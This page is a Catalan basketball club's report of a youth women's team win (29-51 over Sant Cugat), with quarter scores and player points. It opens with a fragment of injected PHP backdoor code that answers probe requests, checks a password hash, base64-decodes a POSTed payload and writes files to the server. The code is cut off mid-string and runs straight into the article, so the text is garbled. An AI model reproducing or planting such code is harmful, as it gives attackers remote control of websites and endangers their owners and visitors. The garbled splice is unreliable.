function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Any nou, nova victòria pel Cadet 08A! (29-51) - Tgn Bàsquet Club -

Any nou, nova victòria pel Cadet 08A! (29-51)

Updated: gener 16, 2024

Any Nou, Lliga nova i segona victòria de la temporada! Deixem enrere una primera fase a preferent A de la qual podem estar satisfets. Vam competir cada setmana contra els millors de Catalunya, però només vam aconseguir guanyar un partit. Feia setmanes que no rebíem el premi de la victòria tot i treballar molt bé cada entrenament, tot i donar-ho tot a cada partit.

Avui no ha estat el millor partit de la temporada, però des del minut 1 de partit hem sortit amb l’actitud i la intensitat adequades per endur-nos la victòria cap a Tarragona. Un primer quart on la nostra defensa ha superat en tot moment l’atac de les locals i que permetia que el marcador mostrés un 4-15 al final dels primers 10 minuts. A partir d’aquí el partit s’ha tornat molt dur, l’arbitratge ha deixat jugar molt i el Sant Cugat ha posat moltes mans en defensa per poder superar el nostre major físic. En atac no hem estat verticals cap a l’aro i hem abusat massa del bot, fet que ha permès a les locals retallar diferències en el marcador. A cada atac xocàvem contra la paret i ens ha costat molt anotar. Perdem el segon quart però amb una diferència en el marcador encara de 9 punts (15-24).

A la mitja part parlem sobretot que si volíem endur-nos el partit calia ser més consistents en defensa i aprofitar el nostre avantatge interior. Ho posem en pràctica immediatament que comença el tercer quart, un parcial inicial 1-11 ens permet jugar amb més confiança i aconseguir no patir fins al final del partit. El Sant Cugat es posa tota la resta de partit en una zona 2-3 molt tancada que ens permet molts llançaments de 3 punts, amb un percentatge del 35% des del 6,75 finiquitem el partit. Resultat final 29-51.

Portàvem 5 setmanes sense competir, no hem estat brillants, però com mola guanyar!! La setmana vinent contra un vell conegut de la temporada passada, el Vilabàsquet Viladecans, equip de nivell, un altre repte en aquesta segona fase de la temporada, no serà gens fàcil, però segur que ho farem bé! Ànims TGN!

SANT CUGAT 29 – CADET FEM 08A 51

Parcials: 4-15; 15-24; 22-38 ; 29-51

SANT CUGAT: Blanca 1; Natàlia 7, Anna 6, Marta 2, Cristina 1, Julia 2, Isona 0, Julia b 1, Alba 3, Lucia 6.

TGN: Diana 2, Juny 1, Sofía 1, Marina 7, Daniela 3, Helena 2, Julia 6, Èlia 2, Marta 6, Mireia 8, Lucía 6, Paula 7